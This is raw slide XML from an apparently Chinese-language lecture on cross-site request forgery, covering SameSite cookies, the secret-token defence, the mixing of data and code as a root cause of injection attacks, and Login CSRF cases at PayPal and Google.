              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（不与跨网站请求一起发送）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（通过跨站请求发送）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13582439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201"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Shape 202"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>对策</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>: Secret Token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Shape 203"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="168265" y="1356967"/>
            <a:ext cx="8520600" cy="3897300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器在每个网页内嵌入随机秘密值。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>当从此页面发起请求时，秘密值将包含在请求中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器检查此值以查看请求是否跨站点。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>来自不同来源的页面将无法访问秘密值。 这是由浏览器保证的（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the same origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>polic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，同源策略）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>秘密是随机生成的，对于不同的用户是不同的。 因此，攻击者无法猜测或发现这个秘密。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3695700" y="2067367"/>
            <a:ext cx="4133850" cy="457200"/>
            <a:chOff x="2832" y="1008"/>
            <a:chExt cx="2604" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="1008"/>
              <a:ext cx="2544" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="1035"/>
              <a:ext cx="2604" cy="213"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>&lt;input type=hidden value=23a3af01b&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="876300" y="1914967"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="1876867"/>
            <a:ext cx="800100" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="947158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9571" y="228600"/>
            <a:ext cx="8211416" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>根本原因</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="2133600"/>
            <a:ext cx="2687507" cy="3810000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Mixing data and code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>混合在一起是造成多种类型的漏洞和攻击的原因，包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>注入攻击，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>攻击，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>函数攻击和格式字符串攻击等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E5EE3D2-7F60-41C6-9769-67493496C67F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="15208" t="25185" r="30135" b="10370"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1676400"/>
            <a:ext cx="6227893" cy="4130500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4749389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066" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>Secret Token</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88067" name="Content Placeholder 4" descr="Picture 13.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="-9982" r="-9982"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1495425"/>
            <a:ext cx="8458200" cy="5057775"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="5872163"/>
            <a:ext cx="8253413" cy="681037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="38100" dir="2700000" algn="br" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="42999"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Oval 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="5991225"/>
            <a:ext cx="4078288" cy="47942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anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136958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000" dirty="0"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226208" y="1560595"/>
            <a:ext cx="8520600" cy="4555200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Login CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是一种攻击类型，攻击者可以强制用户登录攻击者在网站上的帐户，从而揭示登录时用户正在做什么的信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PayPal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>曾有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Login CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞，攻击者可以让用户登录攻击者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PayPal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>账户。 当用户后来在网上付费时，他们不知不觉地将其信用卡添加到攻击者的帐户。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>谷歌也有类似漏洞，使得攻击者可以让用户登录攻击者的账户，并在以后检索用户在登录时所做的所有搜索。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190500" y="5982937"/>
            <a:ext cx="8763000" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>support.detectify.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/customer/portal/articles/1969819-login-csrf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9322805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5" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8194" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2621965506"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="1600200"/>
          <a:ext cx="7924800" cy="5119688"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj name="Acrobat Document" r:id="rId3" imgW="6998400" imgH="4521600" progId="AcroExch.Document.7">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" r:id="rId3" imgW="6998400" imgH="4521600" progId="AcroExch.Document.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600200"/>
                        <a:ext cx="7924800" cy="5119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Oval 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="3810000"/>
            <a:ext cx="2990850" cy="6858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pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4886325" y="2619375"/>
            <a:ext cx="2057400" cy="3048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Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10C2E831-F7C8-4E85-A101-7411FD7E21D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224909" y="6556985"/>
            <a:ext cx="5219700" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
